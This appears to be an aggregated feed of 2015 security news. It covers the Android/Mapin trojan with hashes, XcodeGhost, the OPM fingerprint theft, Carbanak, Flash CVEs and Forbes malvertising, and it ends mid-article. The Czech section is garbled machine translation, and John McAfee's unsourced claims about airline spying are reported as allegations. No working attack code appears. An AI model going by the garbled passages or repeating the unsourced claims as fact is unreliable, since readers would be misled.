Existují odchylky ve způsobu, jakým tento malware je vypuštěn. Trojský kůň je zrušen a oběť je požádán, aby jej nainstalovat 24 hodin po prvním spuštění staženého žádosti. Tato metoda se zdá méně podezřelé uživatele a z něj dělá věří, že požadavek na instalaci aplikace pochází z operačního systému. Ostatní Trojan verze nečekejte 24 hodin, ale okamžitě začít. Všechny varianty jsou spuštěny po připojení se změní, když je vysílání přijímač registrovaná v manifestu.

Obrázek 3: Připojení změna přijímač
Při změně připojení, je uživatel vyzván k instalaci "uplatnění systému". Upuštěný malware předstírá, že je Google Play aktualizace nebo Spravovat nastavení.

Obrázek 4: Instalace žádostí Trojan
Pokud se uživatel rozhodne zrušit a ne nainstalovat, pak on nebo ona bude znovu vyzváni k instalaci při každém připojení se změní. Průměrný uživatel bude přesvědčen, že je to nějaký důležitou aktualizaci a na nějakém místě, je pravděpodobné, že ji nainstalovat jen proto, aby se zbavit tohoto oznámení. Za to, že Trojan spustí službu s vlastním registrované vysílání přijímač, čekají na další změnu připojení.
Když dojde k připojení, malware pokusí zaregistrovat se s Google Cloud zprávy (GCM) servery před malware může přijímat zprávy. Po registraci GCM Android / Mapin bude registrovat infikovaného zařízení na vlastní server, který posílá uživatelské jméno, účet Google, IMEI, registrační číslo a vlastním jménem balíku.

Obrázek 5: Zaregistrování zařízení na server útočníka
Aby se před odinstalovat, Trojan požaduje, aby uživatel aktivovat "správce zařízení":

Obrázek 6: správce zařízení
Trojský oznámí vzdálený server o tom, zda aktivace zařízení správce byla úspěšná nebo ne. Následně se uživatel dostane celou obrazovku (intersticiální) ad vyklopen do pracovní polohy. To intersticiální reklama se zobrazí při každém připojení změny času. Tyto reklamy jsou dodávány zneužitím legitimní AdMob SDK.

Obrázek 7: vsunuté reklamy
Komunikace prostřednictvím služby Google Cloud Zprávy
Trojan komunikuje se serverem pomocí služby Google Cloud Messaging (GCM). Tato komunikace je stále více a více obyčejný v malware v těchto dnech. Backdoor může reagovat na příkazy přijaté ze serveru.

Obrázek 8: Příkazy
Ne všechny jeho funkce byla plně provedena, a některé funkce, které je implementována se nepoužívá. Je zde možnost, že tato hrozba je stále ve vývoji a Trojan lze zlepšit v budoucnu. Jeho hlavním účelem, řízené ze vzdáleného serveru, je dodávat agresivní reklamy pro koncové uživatele, zatímco předstíral, že aplikace systému.
To může také přinést další škodlivý program, do zařízení uživatele. To můžete povolit nebo zakázat intersticiální nebo bannerové reklamy, změnit ID vydavatele pro zobrazení reklamy, vyberte, zda chcete zobrazovat reklamy pro uživatele, změňte dobu prodlevy mezi reklamami být ukazován, instalace, stahování a spouštění aplikací, push oznámení, zrušit zařízení admin práva, změnit server, se kterou komunikuje malware, a vytvořit zástupce na domovské obrazovce adresy URL, které instalují stažené aplikace. Po provedení každého úkolu, přijímat pomocí GCM, zařízení klienta informuje vzdáleného serveru přes HTTPS, že jeho úloha byla úspěšně dokončena.
Trojan byl úspěšně nahráli na Google Play Store, pravděpodobně proto, že vyhazovač nebyly realizovány všechny relevantní malwaru spouští, v tomto případě pro emulaci změnu připojení k síti. Další zajímavou otázkou je, proč Bouncer ani staticky analyzovat spustitelný soubor uvnitř aktiv nahrané hry. Z tohoto důvodu je Trojan zůstal nedetekováno a byl volně dostupných uživatelům. Infikovaná hra "Super Hero dobrodružství" byl nahrán na Play Store vývojář "SHSH". Je možné, že více aplikací z tohoto vývojáře byly odeslány na oficiální obchod Google. Trojans byly nakonec vytáhl z Obchodu Play Google, ale byly odhaleny již téměř rok a půl. Snad proto, že o tomto a podobných případech, Google oznámil, že od března 2015 jsou všechny aplikace a aktualizace musí projít lidskou kontrolu.
Osvědčené postupy pro zamezení stahování malwaru z oficiálního obchodu je stahovat aplikace z důvěryhodných vývojářů a číst komentáře od lidí, kteří jsou už je používají. A také zvážit, zda oprávnění, že aplikace očekává, když to požaduje instalaci jsou oprávněné. Pokud se něco podezřelého děje, zvažte dodává vzorek do svého dodavatele antivirového softwaru pro analýzu, spolu s vašimi důvody pro podání.
Více informací & hash
Název aplikace Jméno balíčku MD5 Detekce
Dálnice Zombie com.heighwayzombie 2f6323af124f9fd57edb1482827f9481 Android / TrojanDropper.Mapin
Plant vs Zombie com.plantzombie 8721901a2caaeb98a19e0fb909ce2569 Android / TrojanDropper.Mapin
USubway Suffer com.subwaysuffers ba3c1894310d38aa814ad3c58f1c8469 Android / TrojanDropper.Mapin
Climb závodní com.hillclimbrace 87cc79d6f6795fea0df109e181d1a3e8 Android / TrojanDropper.Mapin
Temple Run 2 Zoombie com.templerunzombies d5afd7ba5b3bd24cd4fa5201882e1a9d Android / TrojanDropper.Mapin
Dopravní Racer com.traficracer 9cbfd66f35a36d9f75a89f342da9c784 Android / TrojanDropper.Mapin
Google Play aktualizace com.system.main f8df9e2d21018badc7555a9233a8b53e Android / Mapin
Uspořádat Block - Cihla hru d7facf652d3947a53f85431ba8a4cd4a Android / TrojanDropper.Mapin
Spravovat nastavení com.appgp.main 5586e93ac84317348904adfe01c9715c Android / Mapin
Candy crush com.tgame.candycrush 745e9a47febb444c42fb0561c3cea794 Android / TrojanDropper.Mapin
Spravovat nastavení com.appgp.main c19896fdd3b96b9324c6b79cc39eca5b Android / Mapin
Super Maria dobrodružství 0d7c889e8a9be51a58041d55095f104f Android / TrojanDropper.Mapin
Spravovat nastavení com.appgp.main c19896fdd3b96b9324c6b79cc39eca5b Android / Mapin
Super Maria cesta com.tgame.maria ee8e4e3801c0101998b7dfee33f35f95 Android / TrojanDropper.Mapin
Google Play Aktualizace com.appgp.main 195432955e70ec72018ead058f7abc2d Android / Mapin
Zombies dálnice vrah com.absgame.zombiehighwaykiller 1516174c4a7f781c5f3ea6ac8447867b Android / TrojanDropper.Mapin
Spravovat nastavení com.appgp.main f05ac3ac794ee8456db4d0331830d2d8 Android / Mapin
Rostliny VS Zombies com.tgame.plantvszombie 10edaf2b4c25375644faf78a25790061 Android / TrojanDropper.Mapin
Google Play Aktualizace com.appgp.main f8879f759b00ed9d406dd14ce450584b Android / Mapin
Rostliny VS Zombies com.popcap.pvz_row 9b72df484915ce589ade74e65ecdfaed Android / TrojanDropper.Mapin


How does this privacy apply to cybersecurity? The rule of the cyberlaw in the protection of cyber vendor services against the risk of litigation exposure.
In most countries and most legal systems, the sanctity of the attorney client relationship is guarded by the courts. Without confidentiality and privacy, the system of law can break down from the lack of trust. Thus, the institution of law protects the privacy of the client relationship in order to promote the integrity and legitimacy of the legal system, which in turn, bolsters the good order and efficiency of other societal institutions.

How does this privacy apply to cybersecurity? Cybersecurity services between vendor and customer, especially the transfer of data, can be protected much like the delivery of other legal services underneath unique legal system privileges. There is also the added dimension of cyberlaw risk advisory, to correlate technical details with meaningful exposure and compliance analysis.

The US market is especially sensitive to litigation exposure. This risk would apply to any organization with data exposure in the US. As we have seen with recent cases in US courts, this exposure risk extends through a company’s supply chain irrespective of a company’s direct data exposure in the US market.

In light of the cyberlaw advantage, why would a customer of cybersecurity services, especially after suffering a cyberattack, leave open to litigation or regulatory risks all its errors and omissions when there are structural protections available from cyberlaw counsel?

cyberlaw 2

More and more, Security Affairs is seeing interdisciplinary approaches to cyber defense, including economics, insurance, risk management, and emergency preparedness. Adding the problem-solving dimensions of cyberlaw is a welcome addition.

A cyberlaw leader, Doug DePeppe of eosedge Legal, offered an analogy:

“Under the InfoSec ‘CIA Triad’, the objectives of confidentiality and integrity are protected by privacy-wrapping tools like encryption and network security technologies. With these technologies, we seek to maintain the privacy of data. Think of cyberlaw as another privacy wrapper enabled by an institution rather than a technology.”
The cyberlaw model is best introduced up-front during incident response planning and risk assessments. Trusted advisory, a staple of the institution of law, is another benefit. Additionally, the cyberlaw model is not limited simply to the delivery side of vendor services. The entire cyber domain ecosystem can benefit, including in the production of cyber intelligence.

“Cyberlaw differentiation from the standard practice of law has generated interest from White Hats. For one, they often need legal guidance; but additionally, confidentiality enables trust building, legal landscape navigation, and prudent, law-abiding cyber operations. With so much uncertainty surrounding cyber intelligence, we have found that the institution of law is a trust-enabling institution that aids information sharing.” said Doug DePeppe.

Security Affairs continues to monitor and bring news about emerging interdisciplinary approaches to cybersecurity. A structural and privacy-enhancing dimension from cyberlaw seems to add an important Best Practice perspective to reduce cyber risk exposure.

Data breaches, stolen data and their sale in the Dark Web

Trend Micro published a report that explains the dynamics triggered by data breaches, following data from the incidents to their offer in the Dark Web.

Stolen data is a precious commodity in the criminal ecosystem, and in particular in the Deep Web. The great number of data breaches that security firms frequently discover are fueling the underground market of an impressive amount of users’ data.

Let’s think to the recent attacks suffered by Ashley Madison, OPM and Hacking Team that impacted millions of users, their accounts and intellectual property were compromised by even more sophisticated hacks.

As usual experts at Trend Micro are a source of inspiration for me, like me, they constantly monitor the evolution of the criminal underground giving us an interesting point of view of the activities of the principal crime rings.

The last report entitled “Follow the Data: Dissecting Data Breaches and Debunking the Myths” focuses on the data breaches and the dynamic triggered by such kind of events.

The experts integrated their analysis with data from the Privacy Rights Clearinghouse (PRC)’s Data Breaches database, they discovered hacking or malware account for 25 percent of data breaches in Q1 2015. Other causes are insiders, physical skimming devices and the loss or theft of devices (i.e. Mobile devices, flash drives).

method of data breaches

method of data breaches

Data breaches are phenomena really complex to analyze, it is not easy to promptly discover the root causes neither to predict the medium and long-term effects on the victims.

Some data breaches are caused by threat actors intentionally, others are the result of an unintended disclosure, typically personnel mistakes or negligence.

The statistics on the data breaches confirm that the number of incidents that exposed credit and debit card data has increased 169% in the past five years. It is interesting to note that the value of information in the underground market is rapidly changing, while the prices for credit and debit card, bank account, and personally identifiable information (PII) dropping due to oversupply, the value of compromised Uber, online gaming and PayPal accounts are rising. PII is the data most likely stolen followed by financial data.

Analyzing the data breaches per industry, it is possible to note that Healthcare it the most affected by data breaches, followed by government, and retail.

The report follows the entire life cycle of the data breaches, from the intrusion to the offer of the stolen data on the Dark Web.

The researchers investigated on the prices of commodities in the black markets hosted in the Tor Network, US accounts of mobile operators can be purchased for as little as $14 each, but the underground offer much more, including Amazon, eBay, Facebook, PayPal, Netflix, and Uber accounts.

data breached stolen data offer

data breached stolen data offer

The offer is very articulated and multiple factors contribute to the final price of the commodity, for example PayPal and eBay accounts which have a few months or years of transaction history go up to $300 each.

Bank account offered for a price ranging from $200 and $500 per account, depending on the balance and the account history.

As anticipated the disconcerting finding of the research is related to the value of personally identifiable information (full address, a date of birth, a Social Security number, and other PII), each record is sold for $1.

As already reported by other reports, document scans of passports, driver’s licenses and utility bills, are becoming even more popular, many sellers in the black markets include in their offer also this kind of information that could dramatically improve the efficiency of fraud schema.

Document scans are available for purchase from $10 to $35 per document.

XCodeGhost Attack – Is Apple’s Biggest Hack Ever linked to the US Intelligence?

Rumors on the Internet are linking the attack based in XcodeGhost to operations conducted by the CIA (Central Intelligence Agency).
A few days ago principal security firm reported the first major cyber attack on the official Apple App Store, thousands of legitimate applications were infected by the XCodeGhost Malware. Apple announced it is cleaning up the official iOS App Store to remove malicious iPhone and iPad applications, the company confirmed that this is the first large-scale attack on the official store that evaded the stringent app review process of the company.

“We’ve removed the apps from the App Store that we know have been created with this counterfeit software,” Apple spokeswoman Christine Monaghan said in an email. “We are working with the developers to make sure they’re using the proper version of Xcode to rebuild their apps.”
The cyber attack was reported by several cyber security firms that detected a malicious program dubbed XcodeGhost that was used to “trojanize” hundreds of legitimate apps. The researchers confirmed that the attackers have infected several apps, including the popular mobile chat app WeChat and the music app from Internet portal NetEase.

Despite the prompt response of the Apple security team, the infection is increasing exponentially, the security firm FireEye detected more than 4,000 infected apps in the App Store.

“Immediately after learning of XcodeGhost, FireEye Labs identified more than 4,000 infected apps on the App Store. FireEye has since updated detection rules in its NX and Mobile Threat Prevention (MTP) products to detect the malicious apps and their activity on a network. FireEye NX customers are alerted if an employee uses an infected app while the iOS device is connected to the corporate network.” states FireEye.
Attackers embedded the malicious code in the apps by deceiving developers and tricking them into use a bogus version of the Apple Xcode.
“The hackers embedded the malicious code in these apps by convincing developers of legitimate software to use a tainted, counterfeit version of Apple’s software for creating iOS and Mac apps, which is known as Xcode, Apple said.” reported the Reuters.

AppleFlaw XCodeGhost attack

Now rumors on the Internet are linking the attack based in XcodeGhost to operations conducted by the CIA (Central Intelligence Agency).
The XcodeGhost is used by hackers to take over the victim’s mobile device, it is able to steal credentials, Hijack user’s traffic, and steal iCloud passwords from the device.

The attack method implemented by the XCodeGhost is similar to the one developed by the experts at the Central Intelligence Agency (CIA) which was reported by The Intercept in March 2015.

The report, published by The Intercept, is based on documents leaked by Edward Snowden, it described the effort of the US intelligence in exploiting the Xcode as a vector of infection. The US Intelligence was able to use it to establish a backdoor into iOS apps avoiding any control.

Every app built with the bogus version of Xcode were able to spy on users.

“The security researchers also claimed they had created a modified version of Apple’s proprietary software development tool, Xcode, which could sneak surveillance backdoors into any apps or programs created using the tool. Xcode, which is distributed by Apple to hundreds of thousands of developers, is used to create apps that are sold through Apple’s App Store.The modified version of Xcode, the researchers claimed, could enable spies to steal passwords and grab messages on infected devices. Researchers also claimed the modified Xcode could “force all iOS applications to send embedded data to a listening post.” It remains unclear how intelligence agencies would get developers to use the poisoned version of Xcode.” states an excerpt from the report published by The Intercept.

The description matches with the XCodeGhost attack, of course, these are just assumptions, but many security experts consider plausible the entire story.

5.6 Million Federal Employees' Fingerprints Stolen in OPM Hack

The OPM Data Breach (Office of Personnel Management) is getting even worse than we thought.
We already know more than 21 Million current and former federal employees had their personal and highly sensitive private information hijacked in a massive data breach that affected Defense Department's OPM.
But, now it has been revealed that the hackers have made off a lot more than just names, residential addresses, and social security numbers of the US government employees. And it’s the unique and all time constant identity – The Fingerprints.
5.6 MILLLLLION Fingerprints Breached
The US officials on Wednesday admitted that nearly 5.6 Million Fingerprints of its federal employees were also stolen in the massive data breach took place in April this year.
The OPM, the US government agency that handles all federal employee data, had previously reported that some 1.1 Million Fingerprints were stolen. However, this figure has now been increased to 5.6 Million.
Let's give it a thought, stolen fingerprints seems to be an even worse scenario than Stolen passwords, as unlike passwords, you can't change your fingerprints.
Fingerprints are now frequently used in biometric authentication from smartphones to government checkpoints and background checks. So once stolen, the miscreants can keep on misusing your fingerprint data to do other malicious things for the rest of your life.
However, federal experts believe that the "ability to misuse fingerprint data is limited… This probability could change over time as technology evolves," OPM's Press Secretary Samuel Schumach said in a statement on Wednesday.
What's even worse?
The final number (5.6 Million) isn't confirmed yet, as Schumach noted that an interagency investigation group will "continue to analyze and refine the data as it prepares to mail notification letters to impacted individuals."
Yes, the OPM has set up an interagency team – which includes members of the FBI, Defense Department, and Homeland Security, among others – to review the potential ways hackers could "misuse fingerprint data now and in the future."
The Government also ensures that it will provide additional information to the affected individuals if hackers found new ways to misuse their fingerprint data in the future.
For now, whoever has access to the Goldmine – Stolen OPM data – holds a highly Powerful, unchangeable key.

China spies on airline passengers with IMSI-catchers

The popular expert John McAfee claims passengers with four Chinese airlines are spied with the IMSI-catchers technology by the Government of Beijing.
The former owner of McAfee security firm, John McAfee was always known to have made some controversial comments in the IT industry, but also to have good sources that let him get precious information at first hand. This time in his most recent article, he talks about the ability of the Chinese government to spy on four highly renowned airlines costumers.

John McAfee has never revealed the names of the airlines and never explained how he got this information, but he provided details on the tactic behind the cyber espionage campaign.

IMSI-catchers McAfee

First, he got an Android software that had the capability to detect “man in the middle attacks by devices that emulate legitimate cell phone towers, to hundreds of international travelers flying with four highly renowned airlines”.

The software tries to detect anomalies in the IMSI-catchers (International Mobile Subscriber Identity), something that manufacturers can’t hide.

The next question is, but what is an IMSI-catcher?

“IMSI-catchers are devices that emulate cell phone towers. They trick our smartphones into believing a cell tower suddenly appeared in close range and entices our phones to connect through it.”

If your mobile is caught by any IMSI-catchers, you are in trouble. Once you are connected to the fake cell tower a man-in-the-middle attack is performed, “the IMSI-catcher analyses our configuration and “pushes” the necessary software into our smartphones in order for some third party related to the IMSI catcher to take control.”

If you are interested in more details on this technology give a look to the post “StingRay Technology: How Government Tracks Cellular Devices” where I provided detailed information on IMSI-catchers and similar devices.

The use of IMSI-catchers is well-known and documented, but it’s alarming that is being used by airlines controlled by the Chinese government.

The method used by the airlines to control the passengers is simple as effective as reported by the Internationa Business Times, the airlines use the IMSI-catcher to compromise traveler’s devices when it is attempting to connect to the onboard Internet.

“In every case where an international traveler with these four airlines attempted to connect to the onboard internet, a module was pushed to the connecting smartphone that surreptitiously turned on the 3G or 4G communications (without displaying the corresponding icon). From that point, an onboard IMSI-catcher attempted to connect to the phone. There was a 100% success rate.”

After this step, it will be determined if your mobile have already installed an Android APP called ” Silent Logging“, if not the application will be pushed to your device.

“Silent Logging” has the purpose of spying on you and uses the following permissions:

mcafee silent logging airlines spy passengers IMSI-catchers

mcafee silent logging airlines spy passengers IMSI-catchers

“After Silent Logging is activated, a spyware app is downloaded to the users’ smartphone that utilises the Silent Logging app, unless the phone is “physically wiped” by the manufacturer, this software remains forever.”

If you try to do a factory reset by your own be aware that the spyware will detect it and emulate that you are doing a factory reset.

Once you have this spyware installed your device will available for the government to check on you, reading emails, SMS, recording videos, voice,etc etc, and all is sent to China.

The alleged espionage activity operated by the Chinese Government through the IMSI-catcher technology is alarming, and should be taken seriously.

Čínští kyberzločinci ukradli miliony otisků prstů, tvrdí USA
24.9.2015 Incidenty

Neznámým hackerům se podařilo získat otisky 5,6 milionu lidí, kteří žádali nebo už získali bezpečnostní prověrku americké vlády. Původně mělo jít o 1,1 milionu otisků. Nyní ale bylo upřesněno, že na jaře byl odcizen až pětinásobek dat.

Terčem útoku byly osobní údaje 21,5 milionu bývalých či nynějších zaměstnanců amerických federálních úřadů, nebo osob, které se o práci v těchto institucích ucházely.

Američtí vyšetřovatelé se domnívají, že za útokem je Čína. I proto si odhalení získalo velkou pozornost kvůli svému načasování - v Americe je totiž nyní na návštěvě čínský prezident Si Ťin-pching (Xi Jinping). Kromě jiného se setkal i se zástupci velkých technologických firem. Ťin-pching vytrvale odmítá, že by Čína stála za útoky mířící proti americkým firmám.

Podle expertů krádež výrazně pomůže čínské rozvědce a může rovněž vést k odhalení některých amerických špionů. Kromě otisků prstů získali hackeři i čísla sociálního pojištění a další citlivé údaje.

Přestože je podle OPM možnost zneužití otisků prstů omezená, je hackerský útok pohromou, píše agentura AP. Už v červnu podezřívali vládní zdroje čínské kyberzločince z odcizení osobních dat čtyř milionů lidí z úředních serverů v USA.

Krádež otisků prstů by mohla zvýšit ohrožení některých systémů. „Heslo si změníte snadno, ale otisk prstu nezměníte,“ glosoval to server Wired. Vláda dodává, že „podle expertů je riziko zneužití dat o otiscích prstů minimální,“ mohlo by se ale změnit v budoucnu s příchodem nových technologií zabezpečení.

Eset kupuje šifrovací firmu, odhalil i nebezpečný malware

24.9.2015 Viry
Eset kupuje britskou společnost DESlock+, producenta šifrovacích nástrojů. Její řešení už přitom v současné době nabízí v rámci své Technology Alliance.

Společnost DESlock+ vyvinula šifrovací řešení, založené na technologii pro správu šifrovacích klíčů.

Řešení DESlock+ má širokou škálu šifrovacích funkcí, jež zahrnují zabezpečenou správu celého řešení pomocí browseru, mobilní verzi pro iOS, mobilní operační systém společnosti Apple, nebo přenosného klienta DESlock+ GO, který umožňuje bezpečný přístup k datům na pracovních stanicích i bez nainstalovaného produktu DESlock+.

„Náš plán je plně integrovat šifrování do našich produktů pro firmy i domácnosti. A samozřejmě budeme šifrovací technologii DESlock+ dál vyvíjet,“ tvrdí Palo Luka, ředitel pro technologie Esetu.

DESlock+ se má postupně začlenit do struktur Esetu, nebude tedy dále už působit samostatně.

Eset také detekoval nové stopy aktivity obávané skupiny Carbanak. Ta se v letech 2013 a 2014 proslavila cílenými útoky na systémy zhruba stovky bank.

S pomocí malware dokázali zločinci bankovní systémy ovládat do takové míry, že mohli zadávat příkazy k převodu peněz nebo libovolně měnit nastavení bankomatů – například, aby každému, kdo zadá určené heslo, vydávaly vysoké částky.

Arzenál použitého malware se sice změnil, ale části kódů nebo použitý digitální certifikát jasně svědčí o souvislosti s původním škodlivým kódem Carbanak, který Eset detekuje jako Win32/Spy.Sekur.

Za pozornost stojí, že nové útoky skupiny Carbanak tentokrát nemíří jenom na banky, ale také na další instituce z finančního sektoru, například firmy, zabývající se obchodováním s měnami. Mezi zjištěnými cíli byl také hotel a kasino v americkém Las Vegas.

Carbanak, který z bank vysál miliardu dolarů, znovu začíná řádit

23.9.2015 Viry

Letos v únoru byla odhalena „velká kybernetická loupež“, za kterou stála skupina Carbanak, respektive stejnojmenný malware. Ten se šířil po bankách celého světa a umožňoval útočníkům přístup k bankovním systémům. Po menších částkách pak postupně převedli na svoje účty odhadem až miliardu dolarů. Skupina Carbanak je nyní zjevně opět aktivní a už se nezaměřuje jen na banky.

Tady všude „vysával“ Carbanak

Původní velké odhalení má na svědomí tým Kaspersky, nyní však nové odhalení přináší konkurenční ESET. „Arzenál použitého malware se sice změnil, ale části kódů nebo použitý digitální certifikát jasně svědčí o souvislosti s původním škodlivým kódem Carbanak,“ vysvětluje souvislost zástupce Esetu.

Nové formy malwaru cíleného na zaměstnance finančních institucí už si nově nehledá cesty jen do bank, ale také do dalších společností, kde probíhají online transakce s měnami. „Mezi zjištěnými cíli byl také hotel a kasino v Las Vegas,“ upozorňuje ESET.

Nový systém od Applu je děravý. Piráti se do něj dostanou bez hesla

23.9.2015 Mobil
Doslova pár dní stačilo počítačovým pirátům na to, aby si našli zadní vrátka do operačního systému iOS 9. Ten totiž společnost Apple vydala teprve minulý týden. V rekordně krátkém čase se přesto podařilo kyberzločincům přijít na způsob, jak se dostat k cizím datům i bez znalosti hesla.
Před zadními vrátky v operačním systému iOS 9, který využívají chytré telefony iPhone, počítačové tablety iPad a multimediální přehrávače s dotykovým displejem iPod Touch, varoval Národní bezpečnostní tým CSIRT.

„Hackeři nalezli způsob, jak získat přístup k heslům a kontaktům uloženým na zařízeních Apple s operačním systémem iOS verze 9 i v případě, že jsou tato zařízení chráněna přístupovým kódem či technologií touch ID,“ uvedl bezpečnostní analytik Pavel Bašta z týmu CSIRT, který je provozován sdružením CZ.NIC.

Riziko není tak vysoké
Objevená zranitelnost ale nepředstavuje pro běžné uživatele takové nebezpečí, jak by se na první pohled mohlo zdát. Zatímco drtivou většinu jiných trhlin mohou počítačoví piráti zneužít jednoduše na dálku prostřednictvím internetu, nově nalezená zadní vrátka mohou zneužít pouze v případě, že mají telefon skutečně v ruce.

I přesto lze předpokládat, že Apple chybu opraví v dohledné době pomocí nějaké aktualizace. Kdy to ale bude, zatím americký počítačový gigant neuvedl.

Devátá generace mobilní platformy iOS zaujme na první pohled barevnějším vzhledem, který mimochodem v porovnání se současnou osmičkou působí i moderněji. Za líbivým pozlátkem se však ukrývá i celá řada funkčních vylepšení, přehled těch nejnutnějších naleznete v našem dřívějším článku.

Allegedly 40 apps on App Store are infected

A worm was found in the safe garden of Apple. About 40 iOS apps are now being cleaned out of the App Store because they turned out to be infected with malicious code, which had been designed to build a botnet out of Apple devices.

XcodeGhost malware for iOS detected

The malware XcodeGhost affected dozens of apps, including: WeChat app (600+ million users), NetEase’s music downloading app, business card scanner CamCard, and Didi Kuaidi’s Uber-like car hailing app. To make matters worse, the Chinese versions of Angry Birds 2 was infected – is nothing sacred anymore?

Apple spends a lot of time and effort to monitor each and every app in the Apple Store. These efforts set App Store apart from Google Play and third-party stores, which were literally stalked by malicious software (at least until Google launched it’s own malware scanning system in 2014).

Against this background, September 2015 seems to be especially unsuccessful for Apple as experts found malware that targeted jailbroken devices and everybody spoke about the “biggest theft ever involving Apple accounts,” and now Palo Alto Networks company has found compromised software on the App Store.

XcodeGhost #iOS Malware Contained: via @threatpost #apple
— Kaspersky Lab (@kaspersky) September 21, 2015
What is Xcode, and what exactly is XcodeGhost?
Xcode is a free suite of tools used by software developers to create apps for iOS and Apple Store. It is officially distributed by Apple, and unofficially by various third parties.

XcodeGhost is malicious software, designed to affect the Xcode and thereby compromise apps, created with infected tools. Affected applications steal users’ private data and send it to the hackers.

Allegedly 40 or even more apps on #AppStore are infected #Apple #malware
How were the apps compromised?
Apple’s official Xcode was not compromised, the problem is with the unofficial version of the tool uploaded to the cloud storage service of Baidu (Think China’s Google). It’s a common practice in China to download necessary tools from third sites, and this time it turned out to be very bad habit.

There is a reason why Chinese developers choose unofficial and insecure sites instead of safe official resources. Internet in the country is rather slow; moreover, Chinese government limits access to foreign servers to three gateways. As installation package of Xcode tools size is about 3.59 GB, downloading it from Apple’s servers could take a decent amount of time.

Holy cow. Tainted copies of Xcode spreading malware using developers as a vector.
— Matthew Panzarino (@panzer) September 21, 2015
So what actor behind the XcodeGhost needed to do was to infect an unofficial pack of tools with a smart and imperceptible malware and let legitimate developers do the job for them. Researchers at Palo Alto Networks determined that malicious Xcode package had been available for six months and had been downloaded and used to build numerous new and updated iOS apps. Then they were naturally pushed into the App Store and somehow bypassed Apple’s anti-malware scanning system.

Avoid submitting your app with a compromised version of Xcode by using the new `verify_xcode` fastlane action
— Felix Krause (@KrauseFx) September 21, 2015
What’s next?
Recently Apple confirmed to Reuters that all the known malicious apps were removed from the App Store and that the company is now working with developers to ensure they’re using the right version of Xcode.

Apple Asks Developers To Verify Their Version Of Xcode Following Malware Attack On Chinese App Store by @sarahintampa
— TechCrunch (@TechCrunch) September 22, 2015
Unfortunately, the situation is not going to stop here. It’s still unclear how many apps were affected. Reuters notes, that Chinese security firm Qihoo360 Technology Co claims that it had uncovered 344 apps tainted with XcodeGhost.

The incidents can mean the start of a new epoch in cybercrime, with developers being at risk just like unofficial stores and common users. Other criminals can copy the tactics of XcodeGhost creator. Moreover, the SANS Institute reported that the author of XcodeGhost published the malware’s source code on GitHub, and it’s now available for free.

Coincidentally, earlier this year Xcode tools already came into view of media. That time it was in context of the “Jamboree,” a secret annual security researcher gathering sponsored by the CIA.

The CIA has waged a secret campaign to defeat security mechanisms built into Apple devices.
— The Intercept (@the_intercept) March 10, 2015
During the gathering some security researchers reported that they had created a modified version of Apple’s Xcode, which could sneak surveillance backdoors into any apps created using the tool.

Adobe Releases 23 Security Updates for Flash Player


Adobe has released an important security bulletin that addresses a total of 23 Critical vulnerabilities in Adobe Flash Player.
The security fixes for Windows, Linux and Mac users address "critical [flaws] that could potentially allow [attackers] to take control of the affected system," the company warned in an advisory on Monday.
Out of 23 critical flaws, 18 address issues that would have allowed attackers to remotely execute arbitrary code on affected machines and take over control of them.
Critical Vulnerabilities
These 18 security vulnerabilities, all deemed highly critical, are as follows:
Type Confusion Vulnerability (CVE-2015-5573)
Use-after-free flaws (CVE-2015-5570, CVE-2015-5574, CVE-2015-5581, CVE-2015-5584, and CVE-2015-6682)
Buffer overflow bugs (CVE-2015-6676 and CVE-2015-6678)
Memory corruption vulnerabilities that could lead to Remote Code Execution (CVE-2015-5575, CVE-2015-5577, CVE-2015-5578, CVE-2015-5580, CVE-2015-5582, CVE-2015-5588, and CVE-2015-6677)
Stack corruption vulnerabilities (CVE-2015-5567 and CVE-2015-5579)
Stack overflow vulnerability (CVE-2015-5587)
Other Security Fixes
Same-origin-policy bypass bugs (CVE-2015-6679)
Memory leakage security flaw (CVE-2015-5576)
Security bypass flaw that could lead to information disclosure (CVE-2015-5572)
Also, the company also added extra validation checks in Flash's mitigation system in order to reject malicious content from vulnerable JSONP callback APIs.
Affected Software
According to the security bulletin posted by Adobe Monday morning, the affected products include:
Adobe Flash Player Desktop Runtime and Adobe Flash Player Extended Support Release version and earlier
Adobe Flash Player for Google Chrome version and earlier
Adobe Flash Player for Microsoft Edge and Internet Explorer 11 version and earlier on Windows 10
Adobe Flash Player for IE (Internet Explorer) 10 and 11 version and earlier on Windows 8 and 8.1
Adobe Flash Player for Linux version and earlier
AIR Desktop Runtime version and earlier for Windows as well as Mac
AIR SDK version and AIR SDK & Compiler version and earlier on Windows, Android and iOS
AIR for Android version and earlier
The latest Adobe Flash Player versions are for Windows and Mac, as well as version for Linux.
Users of Chrome and Windows 8 running Internet Explorer will receive the updated version of Flash Player automatically. Users of other browsers can manually download updates from Adobe's download page.
Users of the Adobe Flash Player Extended Support Release are recommended to update to the latest version

Malvertising campaign targeted the Forbes Website, million users at risks

Security researchers at FireEye have uncovered a new malvertising campaign that exploited the popular news website.
Security experts at FireEye have uncovered a new malvertising campaign that exploited the popular news website. The malvertising campaign was discovered earlier this month, according to the analysis published by FireEye, the attackers exploited the website to redirect visitors to pages hosting the malicious Neutrino and Angler exploit kits.

“From Sept. 8 to Sept. 15, 2015, the website was serving content from a third-party advertising service that had been manipulated to redirect viewers to the Neutrino and Angler exploit kits. We notified Forbes, who worked quickly to correct the issue.” states the blog post published by FireEye
The researchers discovered that the malvertising campaign exploited a third-party advertising service, the redirections were triggered on a limited number of old articles.

When the article on was loaded, the third-party advertising service is invoked and a JS file containing an iframe is loaded. That iFrame is used to do the dirty job, it redirects the user to the selected exploit kit.

Forbes malvertising

Forbes malvertising

FireEye reported that the Neutrino kit was the primary choice for the attackers behind the malvertising campaign, but threat actors also discovered the use of the Angler exploit kit is becoming quite common.

Forbes malvertising 2

Forbes malvertising 2

“By abusing ad platforms – particularly ad platforms that enable Real Time Bidding, which we’ve covered before here” states FireEye “attackers can selectively target where the malicious content gets displayed.” “When these ads are served by mainstream websites, the potential for mass infection increases significantly, leaving users and enterprises at risk.”

Malvertising campaigns are usually used by criminal organizations to serve ransomware or other malware such as banking trojan and other ad fraud malicious code.

According to the experts the gang behind the recent malvertising campaigns leveraged a number of large ad networks, including AppNexus, DoubleClick and ExoClick.

Targeted attacks on 4Chan and 8Chan exploited bot code in Imgur

Recently a serious vulnerability was discovered in the Imgur service that allowed the injection of malicious code into an image link on the popular website.
Is your website popular? Great you are a privileged target for crooks, just yesterday I reported the last malvertising campaign that hit Forbes and today I decide to present a different kind of attack that is equally dangerous and insidious.

